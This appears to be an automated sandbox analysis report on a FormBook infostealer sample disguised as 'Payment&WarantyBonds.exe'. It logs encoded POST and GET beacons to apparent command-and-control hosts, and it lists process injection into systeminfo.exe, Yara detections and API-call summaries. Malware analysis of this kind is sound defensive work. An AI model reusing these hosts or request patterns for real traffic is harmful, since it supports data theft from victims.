Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:39.526362896 CET  719                OUT        POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=Nam/DfWW7P9HaKxH0tTDCwlMrXEC/Mton4jh6b1hz1pJRRG80lcFdNAwmcFFj1taJftlE1M48np36NNpy1WTxhmmd1kCtj8D0jgW41c2okXADP/ip6Ikn8sVpLCTN6Y/7IGmZjQ5vA1Nh11Ueqcvn5lZqo2ndpUFLaC2zyz1oBnA8YHho3+RiID9vMw+IlfyZA==
Oct 31, 2024 01:40:40.504628897 CET  833                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:40 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HaBDA6u5OAiLgOO3iitkTWt7Gzk3nlOpUZdWmStgVbKi76Dk70lYeB8WTo4t%2FTwQoV5A9CUBjDtEMHJ3XbrGWzR47KgsUF5nr7uiegTWjJdJIm%2BfR4PfpnWzcPuiLofp4LcwS35M%2FkrxAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1754&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.4  50053        34.92.128.59    80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:42.070611954 CET  739                OUT        POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=Nam/DfWW7P9HbqhHncTDVgk+l3ECxstsn4vh6eVxzmdJI0681n4FTtAws8FAtVtRJfRDExM48nt36N9puS6UwxmkWVkAnD8D0jgW4x0YonnAC/vivrIj5ssWjrCTJ6Y77IGEZnZSvCNNh3tUebcsu5lf0Y21XK59Tb/V9krAnyLBw+K75GfGwInOyL5KFmi7CO2K61YWj88E9ZL5kfxVJcw=
Oct 31, 2024 01:40:43.058741093 CET  833                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:42 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n44l2GrAdPQ0zSKfCFTruPRhdLcZAiL19XAF4s6HM7j7Z%2Boipc77%2B7F3rlGczdjpJW3B2eO8Vv4FUGBbscOKfTOLkrLMZz42oCtvP8btoq34B6A%2B2rycEueLohmVCJG3OUKKpI49YwfMqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.4  50054        34.92.128.59    80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:44.619338036 CET  10821              OUT        POST /33ib/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.sgland06.online
                                                                                                                                                                              Referer: http://www.sgland06.online/33ib/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:45.598159075 CET  838                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:45 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WDU6WvB3C9tJ0sIY%2F0d3rdEIqTy%2FKs0g9Lt4eeJVeDrQ5Ha11t9Jz9AARlBhiOIPwccihoKurDxtnYN4%2BE3Ml4IFyEPmz1WgXJ1JCouZnvs4Lu8cEfCM0HzSzhVYij8E0%2FFYX2yqjDOGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=2&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.4  50055        34.92.128.59    80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:47.155249119 CET  454                OUT        GET /33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.sgland06.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:48.113950014 CET  852                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:47 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rb1Hsqw0fAtJt7j%2FD5yS3KpWDyWwmpQnXJ7Fcdjx2RIKZrujqcP6ywLD5tAyhsEc9dB6nSI%2Fzn%2BC3fX0svUGjgIe%2Fi49S%2BfcB8TP%2BvniLhVq7aeTxKH3Uppy0vLyGm0qZVupMsFRtz1JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
49          192.168.2.4  50056        152.42.255.48   80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:53.341141939 CET  713                OUT        POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=ysv3milyC13BonqJ0v8tFhPlhXeHjclmDKf7GB/4yNdPWQJBy7zo2Qvxm/8On+mRQQ1AsMygxFB8Y2Mf1rsDvgNT8nxxm96ngidsIBKdycFeWBsv7v728xnzaKJFqbXdacja5SN+aj5KelXw/7mjdM3XPhZBMIV9XR/TuJ8PiEzl96k4A/vZoTcsWifb5jU8Ng==
Oct 31, 2024 01:40:54.386487007 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:54 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
50          192.168.2.4  50057        152.42.255.48   80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:55.881499052 CET  733                OUT        POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=ysv3milyC13B53aJ2MUtCBPm4neHt8liDKD7GFPoy+5PW11B15LomAvxtf9E4OmYQQJIsJSgxFF8Y38f2asEpgNR0Hx3rd6ngidsIB27ycdeWwcvpdT5jBnwSqJFubWUaciP5ThUagRKenfw/JOkGc3RSRY4J685ewzcvIcUvQCGxcpiROOO6T4fLlWv0gp1Wlt8xHsWI/Ymdr1/C+2s57A=
Oct 31, 2024 01:40:56.913027048 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:56 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
51          192.168.2.4  50058        152.42.255.48   80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:40:58.427463055 CET  10815              OUT        POST /jr4j/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.extrime1.shop
                                                                                                                                                                              Referer: http://www.extrime1.shop/jr4j/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:59.441508055 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:40:59 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
52          192.168.2.4  50059        152.42.255.48   80                3132  C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp                            Bytes transferred  Direction  Data
Oct 31, 2024 01:41:00.965365887 CET  452                OUT        GET /jr4j/?78=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.extrime1.shop
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:41:02.016932011 CET  289                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:41:01 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:20:36:58
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0x1c0000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:20:37:04
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\Payment&WarantyBonds.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                                                                                                                                                                              Imagebase:0xd80000
                                                                                                                                                                              File size:764'928 bytes
                                                                                                                                                                              MD5 hash:A9DA1B42F6AD80EE6085F69E6C25F49B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:20:37:27
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe"
                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:20:37:29
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\systeminfo.exe"
                                                                                                                                                                              Imagebase:0xb60000
                                                                                                                                                                              File size:76'800 bytes
                                                                                                                                                                              MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:20:37:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe"
                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:20:37:55
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true


                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:1.3%
                                                                                                                                                                                Total number of Nodes:229
                                                                                                                                                                                Total number of Limit Nodes:14

Control-flow Graph (legend: Executed, Not Executed)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
Similarity
• API ID:
• String ID: U
• API String ID: 0-3372436214
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 066D638F
Memory Dump Source
• Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID:
• API String ID: 1778838933-0

Control-flow Graph (legend: Executed, Not Executed)
APIs
• GetCurrentProcess.KERNEL32 ref: 007AD49E
• GetCurrentThread.KERNEL32 ref: 007AD4DB
• GetCurrentProcess.KERNEL32 ref: 007AD518
• GetCurrentThreadId.KERNEL32 ref: 007AD571
Memory Dump Source
• Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
Similarity
• API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: 5db09a8c6bae3145b9c9c96f9910ef5941e71eae832cf13d95da93c848336b67
                                                                                                                                                                                • Instruction ID: 2244e586d957c12b662a8c77a97bbc7c9d937ccb7c210c97b93f95ec6366d5cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 5db09a8c6bae3145b9c9c96f9910ef5941e71eae832cf13d95da93c848336b67
                                                                                                                                                                                • Instruction Fuzzy Hash: C15168B0D012498FDB14DFA9D588BDEBBF1AF88304F208569E419A73A0DB749984CF65

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD49E
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 007AD4DB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD518
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 007AD571
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: d63282e96016dec72ade69b2694d84beb732a4cb7844a7e22baa6973c7bc2d7f
                                                                                                                                                                                • Instruction ID: 1fa550b624c83718c3a9aeef0318bdc54decbcd8e910f29d14b5c097f0798c6b
                                                                                                                                                                                • Opcode Fuzzy Hash: d63282e96016dec72ade69b2694d84beb732a4cb7844a7e22baa6973c7bc2d7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 075147B0D00249CFDB14DFA9D588BDEBBF1AF88314F208569E419A73A0D774A984CF65

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C03C6E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: b2c34338a5d6a700adc378af865f62c767bba20037d7d8e64316477f8f0c661d
                                                                                                                                                                                • Instruction ID: c3ee6517f6197093ab6074c1527778403ba540e189c4b41dafddba441b618106
                                                                                                                                                                                • Opcode Fuzzy Hash: b2c34338a5d6a700adc378af865f62c767bba20037d7d8e64316477f8f0c661d
                                                                                                                                                                                • Instruction Fuzzy Hash: 35A18B70D10259CFDB20DF68C841BEDBBB6FF48314F1481AAE818A7290DB749A85CF91

                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C03C6E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: e66282b5d7ccffacf4c8ca67d837710a5df80eec01f5b4ceef85b11da35470ad
                                                                                                                                                                                • Instruction ID: 7044d7293409a14979e0878013d601316f9f001b5811c085c1a43e20fae923a4
                                                                                                                                                                                • Opcode Fuzzy Hash: e66282b5d7ccffacf4c8ca67d837710a5df80eec01f5b4ceef85b11da35470ad
